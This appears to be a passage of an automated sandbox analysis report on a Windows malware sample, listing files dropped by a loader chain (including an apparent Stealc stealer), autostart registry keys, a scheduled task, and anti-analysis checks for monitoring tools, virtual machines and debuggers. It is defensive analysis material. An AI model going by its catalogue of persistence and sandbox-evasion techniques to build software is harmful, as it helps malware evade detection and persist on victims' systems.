                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile created: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_overlapped.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\select.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA224.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_queue.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_socket.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_sqlite3.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\pyexpat.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_poly1305.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD4.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_ARC4.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\libssl-1_1.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_keccak.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_multiprocessing.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_ssl.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\_asyncio.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\python3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_des.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

                                  Boot Survival

                                  barindex
                                  Creates multiple autostart registry keys
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 834ad20df2.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d261d49cf.exeJump to behavior
                                  Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeWindow searched: window name: RegmonClassJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: RegmonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: Regmonclass
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: Filemonclass
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeWindow searched: window name: RegmonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeWindow searched: window name: RegmonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeWindow searched: window name: Regmonclass
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeWindow searched: window name: Filemonclass
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: RegmonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeWindow searched: window name: Regmonclass
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeWindow searched: window name: FilemonClass
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeWindow searched: window name: RegmonClass
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d261d49cf.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d261d49cf.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 834ad20df2.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 834ad20df2.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006B930D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_006B930D
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9989
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-12689
                                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                  Query firmware table information (likely to detect VMs)
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSystem information queried: FirmwareTableInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSystem information queried: FirmwareTableInformation
                                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: PROCMON.EXE
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: X64DBG.EXE
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: WINDBG.EXE
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: WIRESHARK.EXE
                                  Tries to detect virtualization through RDTSC time measurements
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: ADEDAF second address: ADEDB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: ADEDB3 second address: ADEDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: ADEDB9 second address: ADEDD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41C9h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: ADEDD6 second address: ADEDF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0DD1497E70h 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: ADEDF3 second address: ADEDFD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0DD08F41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C55551 second address: C55559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C55559 second address: C55564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0DD08F41B6h 0x0000000a popad 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C55564 second address: C5556B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C5556B second address: C55576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C55986 second address: C5598A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58A59 second address: C58A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58B71 second address: C58B7B instructions: 0x00000000 rdtsc 0x00000002 js 00007F0DD1497E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58B7B second address: C58B99 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0DD08F41BCh 0x00000008 je 00007F0DD08F41B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0DD08F41B8h 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
